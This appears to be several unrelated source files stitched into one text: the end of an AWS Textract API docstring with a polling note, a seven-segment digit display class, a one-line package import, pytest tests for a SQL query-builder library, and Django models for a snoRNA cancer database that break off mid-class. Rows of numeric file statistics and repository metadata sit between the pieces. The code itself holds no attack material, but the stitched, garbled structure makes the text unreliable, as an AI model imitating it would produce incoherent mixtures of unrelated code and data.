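def start_text_detection(client, bucket, name, token=None):
    """Start a text-detection job with an idempotency token.

    Reuse the returned ``token`` when retrying a failed call so the
    service returns the same ``JobId``. ``client`` is assumed to expose
    ``start_document_text_detection``.
    """
    token = token or uuid.uuid4().hex  # 32 alphanumeric chars, within the 64-char limit
    response = client.start_document_text_detection(
        DocumentLocation={'S3Object': {'Bucket': bucket, 'Name': name}},
        ClientRequestToken=token,
    )
    return response['JobId'], token
```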
**Request Syntax**
::
response = client.start_document_text_detection(
DocumentLocation={
'S3Object': {
'Bucket': 'string',
'Name': 'string',
'Version': 'string'
}
},
ClientRequestToken='string',
JobTag='string',
NotificationChannel={
'SNSTopicArn': 'string',
'RoleArn': 'string'
}
)
**Response Syntax**
::
{
'JobId': 'string'
}
**Response Structure**
- *(dict) --*
- **JobId** *(string) --*
The identifier for the document text-detection job. Use ``JobId`` to identify the job in a subsequent call to ``GetDocumentTextDetection`` .
:type DocumentLocation: dict
:param DocumentLocation: **[REQUIRED]**
The location of the document to be processed.
- **S3Object** *(dict) --*
The Amazon S3 bucket that contains the input document.
- **Bucket** *(string) --*
The name of the S3 bucket.
- **Name** *(string) --*
The file name of the input document. It must be an image file (.JPG or .PNG format). Asynchronous operations also support PDF files.
- **Version** *(string) --*
If the bucket has versioning enabled, you can specify the object version.
:type ClientRequestToken: string
:param ClientRequestToken:
The idempotent token that\'s used to identify the start request. If you use the same token with multiple ``StartDocumentTextDetection`` requests, the same ``JobId`` is returned. Use ``ClientRequestToken`` to prevent the same job from being accidentally started more than once.
:type JobTag: string
:param JobTag:
An identifier you specify that\'s included in the completion notification that\'s published to the Amazon SNS topic. For example, you can use ``JobTag`` to identify the type of document, such as a tax form or a receipt, that the completion notification corresponds to.
:type NotificationChannel: dict
:param NotificationChannel:
The Amazon SNS topic ARN that you want Amazon Textract to publish the completion status of the operation to.
- **SNSTopicArn** *(string) --* **[REQUIRED]**
The Amazon SNS topic that Amazon Textract posts the completion status to.
- **RoleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of an IAM role that gives Amazon Textract publishing permissions to the Amazon SNS topic.
:rtype: dict
:returns:
"""
pass
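The docstring above describes a start-then-poll workflow: start the job, watch for a terminal status, then fetch results. A minimal sketch of the polling half, with the AWS call abstracted behind a caller-supplied `get_status` callable (`wait_for_text_detection` and `get_status` are illustrative names, not part of this client):

```python
import time


def wait_for_text_detection(get_status, job_id, delay=5.0, max_attempts=120):
    """Poll ``get_status(job_id)`` until the job reaches a terminal state.

    ``get_status`` stands in for reading ``JobStatus`` from
    GetDocumentTextDetection (or the status value published to the
    Amazon SNS topic).
    """
    for _ in range(max_attempts):
        status = get_status(job_id)
        if status in ("SUCCEEDED", "FAILED"):
            return status
        time.sleep(delay)  # still IN_PROGRESS: wait and poll again
    raise TimeoutError("job %s still running after %d polls" % (job_id, max_attempts))
```

Only when the returned status is ``SUCCEEDED`` should results be fetched, passing the ``JobId`` from the initial ``StartDocumentTextDetection`` call.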
| 75.56443 | 637 | 0.580579 | 8,281 | 70,955 | 4.959667 | 0.057723 | 0.013878 | 0.011784 | 0.01607 | 0.924521 | 0.920017 | 0.914684 | 0.914076 | 0.909766 | 0.901439 | 0 | 0.006669 | 0.336467 | 70,955 | 938 | 638 | 75.644989 | 0.865678 | 0.877669 | 0 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.357143 | false | 0.357143 | 0.25 | 0 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
8dcfbe5873235afd5a82c9e7335312bb694b7d74 | 3,621 | py | Python | seven.py | PUT-Motorsport/PUTM_EV_Dashboard | 3c9cada33c49b405cea309a2670681b14b8d0504 | [
"Apache-2.0"
] | null | null | null | seven.py | PUT-Motorsport/PUTM_EV_Dashboard | 3c9cada33c49b405cea309a2670681b14b8d0504 | [
"Apache-2.0"
] | null | null | null | seven.py | PUT-Motorsport/PUTM_EV_Dashboard | 3c9cada33c49b405cea309a2670681b14b8d0504 | [
"Apache-2.0"
] | null | null | null | from graphics import *
class horz_segment:
def __init__(self,x,y,w):
self.step = w/6
self.segment = Polygon(Point(x+self.step/2,y+self.step/2),Point(x+self.step,y+self.step),Point(x+self.step*4,y+self.step),
Point(x+self.step*4.5,y+self.step/2),Point(x+self.step*4,y),Point(x+self.step,y))
class vert_segment:
def __init__(self,x,y,w):
self.step = w/6
self.segment = Polygon(Point(x+self.step/2,y+self.step/2),Point(x+self.step,y+self.step),Point(x+self.step,y+4*self.step),
Point(x+self.step/2,y+self.step*4.5),Point(x,y+self.step*4),Point(x,y+self.step))
class number:
def __init__(self,x,y,w,win):
self.segments = [horz_segment(x,y,w),horz_segment(x,y+w*4/6,w),horz_segment(x,y+8/6*w,w),vert_segment(x,y,w),
vert_segment(x+4/6*w,y,w),vert_segment(x+4/6*w,y+4/6*w,w),vert_segment(x,y+4/6*w,w)]
for i in self.segments:
i.segment.setFill("white")
self.win = win
def display_number(self,x):
for i in self.segments:
i.segment.undraw()
        if x==0:
            self.segments[0].segment.draw(self.win)
            self.segments[2].segment.draw(self.win)
            self.segments[3].segment.draw(self.win)
            self.segments[4].segment.draw(self.win)
            self.segments[5].segment.draw(self.win)
            self.segments[6].segment.draw(self.win)
elif x==1:
self.segments[4].segment.draw(self.win)
self.segments[5].segment.draw(self.win)
elif x==2:
self.segments[0].segment.draw(self.win)
self.segments[1].segment.draw(self.win)
self.segments[2].segment.draw(self.win)
self.segments[6].segment.draw(self.win)
self.segments[4].segment.draw(self.win)
elif x==3:
self.segments[0].segment.draw(self.win)
self.segments[1].segment.draw(self.win)
self.segments[2].segment.draw(self.win)
self.segments[4].segment.draw(self.win)
self.segments[5].segment.draw(self.win)
        elif x==4:
            self.segments[1].segment.draw(self.win)
            self.segments[3].segment.draw(self.win)
            self.segments[4].segment.draw(self.win)
            self.segments[5].segment.draw(self.win)
        elif x==5:
            self.segments[0].segment.draw(self.win)
            self.segments[1].segment.draw(self.win)
            self.segments[2].segment.draw(self.win)
            self.segments[3].segment.draw(self.win)
            self.segments[5].segment.draw(self.win)
        elif x==6:
            self.segments[0].segment.draw(self.win)
            self.segments[1].segment.draw(self.win)
            self.segments[2].segment.draw(self.win)
            self.segments[3].segment.draw(self.win)
            self.segments[5].segment.draw(self.win)
            self.segments[6].segment.draw(self.win)
elif x==7:
self.segments[4].segment.draw(self.win)
self.segments[5].segment.draw(self.win)
self.segments[0].segment.draw(self.win)
elif x==8:
for i in self.segments:
                i.segment.draw(self.win)
        elif x==9:
            self.segments[0].segment.draw(self.win)
            self.segments[1].segment.draw(self.win)
            self.segments[2].segment.draw(self.win)
            self.segments[3].segment.draw(self.win)
            self.segments[4].segment.draw(self.win)
            self.segments[5].segment.draw(self.win)
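The long if/elif chain in `display_number` can be collapsed into a lookup table. A sketch using the same indexing as `number.segments` above (0 top, 1 middle, 2 bottom, 3 top-left, 4 top-right, 5 bottom-right, 6 bottom-left); `SEGMENT_MAP` is a new name introduced here, not part of the original module:

```python
# digit -> indices into number.segments, same ordering as above
SEGMENT_MAP = {
    0: (0, 2, 3, 4, 5, 6),
    1: (4, 5),
    2: (0, 1, 2, 4, 6),
    3: (0, 1, 2, 4, 5),
    4: (1, 3, 4, 5),
    5: (0, 1, 2, 3, 5),
    6: (0, 1, 2, 3, 5, 6),
    7: (0, 4, 5),
    8: (0, 1, 2, 3, 4, 5, 6),
    9: (0, 1, 2, 3, 4, 5),
}


def display_number(self, x):
    """Table-driven drop-in replacement for number.display_number."""
    for seg in self.segments:
        seg.segment.undraw()
    for i in SEGMENT_MAP[x]:
        self.segments[i].segment.draw(self.win)
```

Besides being shorter, the table makes each digit's segment set easy to audit at a glance.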
| 44.703704 | 130 | 0.578569 | 554 | 3,621 | 3.741877 | 0.070397 | 0.272069 | 0.311143 | 0.373372 | 0.930053 | 0.885191 | 0.871201 | 0.81862 | 0.783406 | 0.766522 | 0 | 0.030134 | 0.257664 | 3,621 | 80 | 131 | 45.2625 | 0.741071 | 0 | 0 | 0.644737 | 0 | 0 | 0.001381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.013158 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
5c3c51c70fa10006e7433831f898e112fd64be1e | 66 | py | Python | evolutionarystrategies/envs/__init__.py | ChristianIngwersen/BombermanRL | 6cad61708211d74fbc1e16776a579861b614f360 | [
"MIT"
] | null | null | null | evolutionarystrategies/envs/__init__.py | ChristianIngwersen/BombermanRL | 6cad61708211d74fbc1e16776a579861b614f360 | [
"MIT"
] | null | null | null | evolutionarystrategies/envs/__init__.py | ChristianIngwersen/BombermanRL | 6cad61708211d74fbc1e16776a579861b614f360 | [
"MIT"
] | 2 | 2019-11-28T16:21:09.000Z | 2021-05-26T12:14:38.000Z | from .make_env import make_vec_envs
from .make_env import make_env | 33 | 35 | 0.863636 | 13 | 66 | 4 | 0.461538 | 0.403846 | 0.423077 | 0.653846 | 0.807692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106061 | 66 | 2 | 36 | 33 | 0.881356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
3093eec30438f77933801111e3698db1e15c86a6 | 15,636 | py | Python | test/test_select.py | Geoge-Henry/crystaldb.py | cbc4430c8447bd978ea710f7e394f76696957b10 | [
"MIT"
] | 3 | 2018-10-08T02:15:04.000Z | 2019-04-02T07:09:00.000Z | test/test_select.py | CrystalSkyZ/tcsql | 897db00161955ae3e52f266507ee1922f185386a | [
"MIT"
] | 2 | 2019-04-26T11:02:32.000Z | 2020-09-01T08:14:32.000Z | test/test_select.py | CrystalSkyZ/tcsql | 897db00161955ae3e52f266507ee1922f185386a | [
"MIT"
] | 1 | 2019-09-11T03:11:17.000Z | 2019-09-11T03:11:17.000Z | #!/usr/bin/python
# -*- coding:utf-8 -*-
# Author: Zhichang Fu
# Created Time: 2019-01-29 21:33:24
import pytest
from .dbmodule import TestDB
class TestSelect(object):
"""
Table:
CREATE TABLE `user` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`gender` varchar(16) DEFAULT NULL,
`name` varchar(64) DEFAULT NULL,
`birthday` varchar(16) NOT NULL,
`age` int(11) unsigned NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `user_2` (
`id` int(11) unsigned NOT NULL DEFAULT '0',
`gender` varchar(16) CHARACTER SET utf8 DEFAULT NULL,
`name` varchar(64) CHARACTER SET utf8 DEFAULT NULL,
`birthday` varchar(16) CHARACTER SET utf8 NOT NULL,
`age` int(11) unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
"""
@pytest.fixture(scope="module")
def dbmodule(self):
return TestDB.db_handle()
@pytest.mark.skipif(False, reason="skipped")
def test_row_sql(self, dbmodule):
"""
SQL:
select * from user where id>80 and gender='girl';
"""
        sql = """select * from user where id>:id and gender=:gender"""
params = {"id": 80, "gender": "girl"}
result = dbmodule.query(sql, params)
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_get(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.id = 80;
"""
result = dbmodule.select("user").get(id=80)
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_get_some_field(self, dbmodule):
"""
SQL:
SELECT user.name, user.age FROM user WHERE user.id = 80;
"""
result = dbmodule.select("user", ["name", "age"]).get(id=80)
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_filter(self, dbmodule):
"""
SQL:
SELECT user.name, user.age FROM user WHERE user.age = 36 \
AND user.gender = 'girl';
"""
result = dbmodule.select("user", ["name", "age"]).filter(
age=36, gender="girl").query() # query or all method
#result = dbmodule.select("user", ["name", "age"]).filter(
# age=36, gender="girl").all()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
print(dbmodule.get_debug_queries_info)
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_distinct(self, dbmodule):
"""
SQL:
SELECT DISTINCT user.name, user.age FROM user WHERE \
user.age = 36 AND user.gender = 'girl'
"""
result = dbmodule.select(
"user", ["name", "age"], distinct=True).filter(
age=36, gender="girl").query() # query or all method
#result = dbmodule.select("user", ["name", "age"], distinct=True).filter(
# age=36, gender="girl").all()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
print(dbmodule.get_debug_queries_info)
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_filter_dict(self, dbmodule):
"""
SQL:
SELECT user.name, user.age FROM user WHERE user.age = 36 \
AND user.gender = 'girl';
"""
condition = dict(age=36, gender="girl")
result = dbmodule.select("user",
["name", "age"]).filter(**condition).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_filter_lt_or_gt(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND \
user.age < 40 AND user.age > 35 AND user.id < 80 \
AND user.id > 60;
Grammar:
Support `lt`, `gt`, `lte`, `gte`, `eq` method.
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).lt(age=40).gt(
age=35).lt(id=80).gt(id=60).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_filter_between(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND user.age \
BETWEEN 35 AND 40 AND user.id BETWEEN 60 AND 80;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).between(id=[60, 80]).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_count(self, dbmodule):
"""
SQL:
SELECT COUNT(*) AS COUNT FROM user WHERE user.gender = 'girl' \
AND user.age BETWEEN 35 AND 40;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).count()
assert result > 0
print(result)
@pytest.mark.skipif(False, reason="skipped")
def test_orm_distinct_count(self, dbmodule):
"""
SQL:
SELECT COUNT(DISTINCT user.name) AS COUNT FROM user \
WHERE user.gender = 'girl' AND user.age BETWEEN 35 AND 40;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).count(distinct="name")
assert result > 0
print(result)
@pytest.mark.skipif(False, reason="skipped")
def test_orm_first(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND user.age \
BETWEEN 35 AND 40;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).first()
assert isinstance(result, dict)
print(result)
@pytest.mark.skipif(False, reason="skipped")
def test_orm_order_by(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND \
user.age BETWEEN 35 AND 40 ORDER BY user.age;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).order_by("age").query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(True, reason="skipped")
def test_orm_order_by_list(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND \
user.age BETWEEN 35 AND 40 ORDER BY user.age, user.name;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).order_by(["age", "name"]).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_order_by_list_reversed(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND user.age \
BETWEEN 35 AND 40 ORDER BY user.age DESC , user.name DESC;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).order_by(
["age", "name"], _reversed=True).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_order_by_list_complex(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND user.age \
BETWEEN 35 AND 40 ORDER BY user.age DESC, user. name ASC;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).between(
age=[35, 40]).order_by("age DESC, name ASC").query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_in(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND user.age \
IN (35, 36) AND user.id IN (80, 81, 82, 85);
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).in_(
age=[35, 36], id=[80, 81, 82, 85]).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_not_in(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND \
user.id IN (80, 81, 82, 85) AND user.age NOT IN (35, 36);
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).in_(
id=[80, 81, 82, 85]).not_in(age=[35, 36]).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_limit(self, dbmodule):
"""
SQL:
SELECT user.* FROM user WHERE user.gender = 'girl' AND \
user.id IN (80, 81, 82, 85) AND user.age \
NOT IN (35, 36) LIMIT 10;
"""
condition = dict(gender="girl")
result = dbmodule.select("user").filter(**condition).in_(
id=[80, 81, 82, 85]).not_in(age=[35, 36]).limit(10)
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_inner_join(self, dbmodule):
"""
SQL:
SELECT user.name, user.age, user_2.name as name2, \
user_2.age as age2 FROM user INNER JOIN user_2 ON \
user_2.id = user.id WHERE user.gender = 'girl' \
AND user_2.gender = 'girl';
"""
condition = dict(gender="girl")
result = dbmodule.select(
"user", ["name", "age"]).filter(**condition).inner_join(
"user_2",
using="id",
fields=["name as name2", "age as age2"],
**condition).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_left_join(self, dbmodule):
"""
SQL:
SELECT user.name, user.age, user_2.name as name2, \
user_2.age as age2 FROM user LEFT JOIN user_2 ON \
user_2.id = user.id WHERE user.gender = 'girl' AND \
user_2.age = 35 AND user_2.gender = 'girl';
"""
condition1 = dict(gender="girl")
condition2 = dict(gender="girl", age=35)
result = dbmodule.select(
"user", ["name", "age"]).filter(**condition1).left_join(
"user_2",
using="id",
fields=["name as name2", "age as age2"],
**condition2).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
#print(result.list())
@pytest.mark.skipif(False, reason="skipped")
def test_orm_right_join(self, dbmodule):
"""
SQL:
SELECT user.name, user.age, user_2.name as name2, \
user_2.age as age2 FROM user RIGHT JOIN user_2 ON \
user_2.id = user.id WHERE user.gender = 'girl' AND \
user_2.age = 35 AND user_2.gender = 'girl';
"""
condition1 = dict(gender="girl")
condition2 = dict(gender="girl", age=35)
result = dbmodule.select(
"user", ["name", "age"]).filter(**condition1).right_join(
"user_2",
using="id",
fields=["name as name2", "age as age2"],
**condition2).query()
print(result)
print(result.__len__())
# result Iter object or result.list() convert to list object
for item in result:
print(item)
assert result.__len__() > 0
print(dbmodule.get_debug_queries_info)
#print(result.list())
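The chained-condition style these tests exercise (`filter` → `between` → `in_` → `query`) can be illustrated with a minimal parameterized WHERE-clause builder. This is a sketch of the pattern only, not crystaldb's actual implementation:

```python
class Where:
    """Accumulate SQL conditions and their parameters through chained calls."""

    def __init__(self):
        self.clauses = []
        self.params = []

    def filter(self, **kwargs):
        # equality conditions: col = %s
        for col, val in kwargs.items():
            self.clauses.append("%s = %%s" % col)
            self.params.append(val)
        return self

    def between(self, **kwargs):
        # range conditions: col BETWEEN %s AND %s
        for col, (lo, hi) in kwargs.items():
            self.clauses.append("%s BETWEEN %%s AND %%s" % col)
            self.params.extend([lo, hi])
        return self

    def in_(self, **kwargs):
        # membership conditions: col IN (%s, ...)
        for col, values in kwargs.items():
            marks = ", ".join(["%s"] * len(values))
            self.clauses.append("%s IN (%s)" % (col, marks))
            self.params.extend(values)
        return self

    def sql(self):
        return " AND ".join(self.clauses)
```

Each method returns `self`, which is what makes the fluent chaining in the tests above possible.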
| 37.052133 | 81 | 0.5456 | 1,858 | 15,636 | 4.455867 | 0.075888 | 0.075734 | 0.053147 | 0.063776 | 0.909289 | 0.880179 | 0.863631 | 0.863631 | 0.843459 | 0.84044 | 0 | 0.028534 | 0.323101 | 15,636 | 421 | 82 | 37.140143 | 0.753685 | 0.351241 | 0 | 0.737557 | 0 | 0 | 0.065671 | 0 | 0 | 0 | 0 | 0 | 0.095023 | 1 | 0.099548 | false | 0 | 0.00905 | 0.004525 | 0.117647 | 0.271493 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
309e2c38f4ddc6d31ce6f354903b11c97259a62a | 88,312 | py | Python | snorna/models.py | chunjie-sam-liu/SNORic | f6d4010a941131a750b34dfa472d7aee2e110131 | [
"MIT"
] | null | null | null | snorna/models.py | chunjie-sam-liu/SNORic | f6d4010a941131a750b34dfa472d7aee2e110131 | [
"MIT"
] | 1 | 2020-04-14T11:33:30.000Z | 2020-04-14T11:33:30.000Z | snorna/models.py | chunjie-sam-liu/SNORic | f6d4010a941131a750b34dfa472d7aee2e110131 | [
"MIT"
] | 1 | 2018-09-14T08:53:30.000Z | 2018-09-14T08:53:30.000Z | from __future__ import unicode_literals
from django.db import models
# Create your models here.
class dataset(models.Model):
dataset_id = models.CharField(max_length=225, null=True)
source = models.CharField(max_length=225, null=True)
cancer_type = models.CharField(max_length=225, null=True)
dataset_description = models.CharField(max_length=225, null=True)
normal_n = models.IntegerField(null=True)
tumor_n = models.IntegerField(null=True)
build = models.CharField(max_length=225, null=True)
average_mappable_reads = models.IntegerField(null=True)
snorna_n = models.IntegerField(null=True)
snorna_rpkm_n = models.IntegerField(null=True)
def __str__(self):
return self.dataset_id
# clinical data
class clinical(models.Model):
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
time = models.IntegerField(null=True)
status = models.IntegerField(null=True)
subtype = models.CharField(max_length=225, null=True)
stage = models.CharField(max_length=225, null=True)
    def __str__(self):
        return self.dataset_id
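The `time`/`status` pair stored on `clinical` is the standard input to survival estimates such as Kaplan-Meier. A dependency-free sketch of the estimator (in practice a library such as `lifelines` would be used; `kaplan_meier` is an illustrative helper, not part of this app):

```python
def kaplan_meier(times, events):
    """Survival curve S(t) at each distinct event time.

    times: follow-up times; events: 1 = event observed, 0 = censored.
    Returns a list of (time, survival_probability) pairs.
    """
    pairs = sorted(zip(times, events))
    n_at_risk = len(pairs)
    surv, curve = 1.0, []
    i = 0
    while i < len(pairs):
        t = pairs[i][0]
        deaths = sum(1 for tt, e in pairs[i:] if tt == t and e == 1)
        ties = sum(1 for tt, e in pairs[i:] if tt == t)
        if deaths:
            surv *= 1.0 - float(deaths) / n_at_risk  # KM product-limit step
            curve.append((t, surv))
        n_at_risk -= ties  # both events and censored subjects leave the risk set
        i += ties
    return curve
```

Censored subjects shrink the risk set without producing a step in the curve, which is exactly the role the `status` column plays.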
class genomic_analysis(models.Model):
snorna = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225, null=True)
gene_expression = models.FloatField(null=True)
mirna_expression = models.FloatField(null=True)
cna = models.FloatField(null=True)
protein_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
# clinical subtype for select
class clinical_subtype(models.Model):
dataset_id = models.CharField(max_length=225, null=True)
subtype = models.CharField(max_length=225, null=True)
state = models.CharField(max_length=225, null=True)
n = models.IntegerField(null=True)
def __str__(self):
return self.dataset_id
# protein_symvbol map
class rppa_name_symbol(models.Model):
    protein = models.CharField(max_length=225)
    gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.protein
# snorna info
class snorna_info(models.Model):
snorna = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=45, null=True)
strand = models.CharField(max_length=45, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
    symbol = models.CharField(max_length=45, null=True)
    type = models.CharField(max_length=45, null=True)
def __str__(self):
return self.snorna
class gene_symbol_info(models.Model):
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.gene_symbol
# snorna_expression
class snorna_expression(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id_expression = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
# mrna_expression
class mrna_expression(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    gene_symbol = models.CharField(max_length=225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
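`mrna_expression` stores a precomputed `spearman_corr` (with `p_value` and `fdr`) between snoRNA and gene expression. For reference, Spearman's rho is simply the Pearson correlation of the two rank vectors; a dependency-free sketch with average ranks for ties (in practice `scipy.stats.spearmanr` would be used):

```python
def _ranks(values):
    """Ranks starting at 1, with ties assigned their average rank."""
    order = sorted(range(len(values)), key=lambda i: values[i])
    ranks = [0.0] * len(values)
    i = 0
    while i < len(order):
        j = i
        while j + 1 < len(order) and values[order[j + 1]] == values[order[i]]:
            j += 1
        avg_rank = (i + j) / 2.0 + 1  # average of positions i..j, 1-based
        for k in range(i, j + 1):
            ranks[order[k]] = avg_rank
        i = j + 1
    return ranks


def spearman_corr(x, y):
    """Spearman's rho: Pearson correlation computed on the rank vectors."""
    rx, ry = _ranks(x), _ranks(y)
    n = len(x)
    mx, my = sum(rx) / n, sum(ry) / n
    cov = sum((a - mx) * (b - my) for a, b in zip(rx, ry))
    sd = (sum((a - mx) ** 2 for a in rx) * sum((b - my) ** 2 for b in ry)) ** 0.5
    return cov / sd
```

Because only ranks matter, any monotone relationship (not just a linear one) scores rho = 1.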
# cnv
class cnv(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
# methylation
class methylation(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
# protein_expression
class protein_expression(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
